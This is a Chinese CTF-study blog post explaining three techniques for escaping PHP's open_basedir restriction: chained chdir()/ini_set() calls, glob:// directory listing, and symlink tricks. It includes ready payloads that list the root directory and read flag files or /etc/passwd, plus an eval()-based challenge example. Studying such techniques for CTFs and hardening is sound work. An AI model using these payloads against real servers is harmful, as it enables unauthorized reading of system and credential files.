Bypass open_basedir

最新推荐文章于 2023-02-09 22:44:26 发布
最新推荐文章于 2023-02-09 22:44:26 发布
阅读量1.5k 收藏 2
点赞数 3
分类专栏: # ctf知识点总结
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/109171655
版权

文章目录

利用chdir()与ini_set()组合Bypass

首先呢chdir(‘img’)到文件的子目录,这一步是复合open_basedir的检查的,因此当前的目录就是/var/www/html/img,接着ini_set(“open_basedir”,”…”),由于内部函数的一系列漏洞,这一代码是可以通过检查的,此时open_basedir的工作目录是(/var/www/html/img)+…,接下来就是不断地chdir(“…”),最终将open_basedir改到了根目录下,于是乎就失效了。。。

payload:
获取目录:

?a=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_r(scandir(%27/%27));

读取flag:

?cmd=chdir('/tmp');mkdir('lethe');chdir('lethe');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(ini_get('open_basedir'));var_dump(file_get_contents(THis_Is_tHe_F14g));




利用glob://伪协议Bypass

注:此方法只能列出根目录下的文件。

glob:// — 查找匹配的文件路径模式。

glob://是php自5.3.0版本起开始生效的一个用来筛选目录的伪协议,其用法示例如下:

<?php
// 循环 ext/spl/examples/ 目录里所有 *.php 文件
// 并打印文件名和文件尺寸
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>

Bypass

只是用glob://伪协议是无法直接绕过的,它需要结合其他函数组合利用,主要有以下两种利用方式,局限性在于它们都只能列出根目录下和open_basedir指定的目录下的文件,不能列出除前面的目录以外的目录中的文件,且不能读取文件内容。
方式1——DirectoryIterator+glob://

DirectoryIterator是php5中增加的一个类,为用户提供一个简单的查看目录的接口。

DirectoryIterator与glob://结合将无视open_basedir,列举出根目录下的文件:

c=?><?php
$a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

输入glob:///*即可列出根目录下的文件,但是会发现只能列根目录和open_basedir指定的目录的文件:

例题:ctfshow-web入门72:

<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

用该payload查看当前目录文件:

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit();?>

成功发现flag0.txt

在这里插入图片描述

方式2——opendir()+readdir()+glob://

opendir()函数为打开目录句柄,readdir()函数为从目录句柄中读取条目。

这里结合两个函数来列举根目录中的文件:

c=?><?php
if ( $b = opendir("glob:///*") ) {
    while ( ($file = readdir($b)) !== false ) {
        echo $file."<br>";
    }
    closedir($b);
}
exit(0);
?>

效果和方式1是一样的,只能Bypass open_basedir来列举根目录中的文件,不能列举出其他非根目录和open_basedir指定的目录中的文件。

例题:ctfshow-web入门72:在这里插入图片描述




利用syslink()函数Bypass

在这里插入图片描述
符号连接

符号链接又叫软链接,是一类特殊的文件,这个文件包含了另一个文件的路径名(绝对路径或者相对路径)。路径可以是任意文件或目录,可以链接不同文件系统的文件。在对符号文件进行读或写操作的时候,系统会自动把该操作转换为对源文件的操作,但删除链接文件时,系统仅仅删除链接文件,而不删除源文件本身

Bypass

原理是创建一个链接文件aaa用相对路径指向A/B/C/D,再创建一个链接文件exp指向aaa/…/…/…/…/etc/passwd,其实就是指向了A/B/C/D/…/…/…/…/etc/passwd,也就是/etc/passwd。这时候删除aaa文件再创建aaa目录但是exp还是指向了aaa也就是A/B/C/D/…/…/…/…/etc/passwd,就进入了路径/etc/passwd

payload构造的注意点就是:要读的文件需要往前跨多少路径,就得创建多少层的子目录,然后输入多少个…/来设置目标文件。

<?php
mkdir("A");
chdir("A");
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("A/B/C/D","aaa");
symlink("aaa/../../../../etc/passwd","exp");
unlink("aaa");
mkdir("aaa");
?>

学习自:
https://wp.ctf.show/d/141-ctfshow-web-58-77-bypass
https://www.cnblogs.com/hookjoy/p/12846164.html
https://www.dazhuanlan.com/2020/02/29/5e5a7992dc634/

天问_Herbert555
关注
专栏目录
浅谈绕过open_basedir 的几种用法
snowlyzz的博客
08-13 5506
简单绕过open_basedir 的几种方法
【web安全】你的open_basedir安全吗?
HBohan的博客
02-24 596
一、open_basedir 看一下php.ini里面的描述: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *NO
bypass open_basedir
eT48_Sec
02-06 920
在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。 <?php /* titile: bypass open_basedir auth: eT48 */ header("Conten-type:text/html; charset:udf-8"); error_repor
[SUCTF 2019]EasyWeb(bypass open_basedir
paidx0
11-08 234
<?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir); } if(!empty($_FILES["file"])){
绕过open_basedir
unexpectedthing的博客
07-02 1594
open_basedir绕过
突破open_basedir进行列举目录
weixin_43999372的博客
11-07 451
open_basedir open_basedir 是php设置中为了防御php跨目录进行文件(目录)读写的方法,所有PHP中有关文件读、写的函数都会经过open_basedir的检查。Open_basedir实际上是一些目录的集合,在定义了open_basedir以后,php可以读写的文件、目录都将被限制在这些目录中。 利用DirectoryIterator + Glob 直接列举目录 Dire...
从0学习bypass open_basedir姿势1
08-03
绕过open_basedir限制的多种姿势 open_basedir是一种PHP配置选项,用于限制用户访问文件的活动范围。通过设置open_basedir的值,可以将用户访问文件的活动范围限制在指定的区域内。但是,这也可能会导致一些安全...
网络安全:绕过 MSF 的一次渗透测试
yinjiyufei的博客
11-23 670
记绕过MSF的一次渗透测试!【网络安全】
2021-10-20 MSSCTF_2021_Finals_WP
m0_56897090的博客
10-20 649
文章目录CryptoBlock_of_Hash_new题目代码题目分析EXPRight_now题目代码题目分析EXPBLOCK_OF_HASH_2021题目代码题目分析EXPOFB_2021题目代码题目分析EXPPWNelfBuychunk_MSSCTF2021Finals笔记EXPshellcode_MSSCTF2021Finals笔记EXPsignin_MSSCTF2021Finals笔记EXPWhereIsGadgets_MSSCTF2021Finals笔记EXPReserveGIFT_MSSCTF2
symlink() open_basedir bypass 原理分析
eT48_Sec
01-05 1541
之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。 原文:http://cxsecurity.com/issue/WLB-2009110068 ok,先来了解一下什么是open_basediropen_basedir 将 PHP 所能打开的文件限制在指定的目录树,包括文件本身。本指令不受安全模式打开或者关闭的影响。
PHP之如何绕过open_basedir
shy的博客
11-27 1450
open_basedir php.ini中原文的说明是: ; open_basedir, if set, limits all file operations to the defined directory ; and below. This directive makes most sense if used in a per-directory or ; per-virtualhost web server configuration file. This directive is ; *N...
PHP绕过open_basedir限制操作文件的方法
lonmar的博客
11-25 1316
文章目录0x00 预备知识0x01 命令执行函数0x02 symlink()函数0x03 glob伪协议 作者:PureT 原文链接:https://www.jb51.net/article/141767.htm 0x00 预备知识 关于open_basedir open_basedir是php.ini中的一个配置选项 它可将用户访问文件的活动范围限制在指定的区域, 假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务
绕过open_basedir读文件脚本
一个码农的笔记
11-13 3429
参加了一场2016年的sycsec感觉又学到不少东西 废话不多说,首先啥是open_basediropen_basedir: 将用户可操作的文件限制在某目录下 具体的设置方法可以参考:http://blog.csdn.net/white__cat/article/details/32734343 这样设置之后,原则上被限制之外的目录是无法读写文件的,但是有一个漏洞却打破了这个限制 参
ctfshow 常用姿势
qq_53063436的博客
11-02 959
ctfshow 常用姿态
15_open_basedir绕过
qq_45301512的博客
02-01 660
将两次结果对比,可以理解open_basedir的作用就是限制访问如果设立在test目录下,那么就只能访问test目录下面的目录或者文件,其它目录下面的内容都无法访问如果不设立open_basedir,任何目录下的内容都可以访问。
Linux: 系统调用追踪原理简析
最新发布
JiMoKuangXiangQu的专栏
02-09 973
linux,ptrace,strace,系统调用追踪
CTF中的Bypass命令执行
D.MIND 的博客
08-03 3164
linux命令敏感字符绕过 反斜杠: ca\t 1.txt 连接符——单引号: ca''t 1.txt 变量拼接字符: a=ca;b=t;$a$b 1.txt base64编码绕过: `echo 'Y2F0Cg==' | base64 -d` 1.txt 命令提示符$: ca$@t 1.txt //$@ 是传给脚本的所有参数的列表 ca$9t 1.txt //$9 是传递给该shell脚本的第九个参数 ...
Apache中open_basedir的安全配置
Toney520的专栏
05-16 6004
在Apache服务器中,切忌一定要在虚拟主机配置文件中添加以下代码,否则PHP木马脚本可以浏览你服务器上的任意文件,这意味着你的服务器很快会被攻破。 系统运维 温馨提醒:qihang01原创内容版权所有,转载请注明出处及原文链接 代码如下: php_admin_value open_basedir "/usr/local/apache/htdocs/www/:/tmp/" 注意:把/usr
PHP绕过disable_function限制
qq_44657899的博客
10-19 2880
文章目录寻找未禁用函数 寻找未禁用函数 一些读取目录的函数: print_r(scandir("/")); var_dump(scandir("/")); 读取文件的函数: highlight_file('flag.php'); include('/flag'); show_source(); require();
"PHP安全学习:绕过open_basedir限制的技巧总结
学习 bypass open_basedir 姿势是针对 php.ini 配置中 open_basedir 选项的限制,在某些情况下我们会遇到无法访问指定目录的问题。通过学习和总结一些 bypass 姿势,可以解决这个问题。open_basedir 是一个用于限制...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值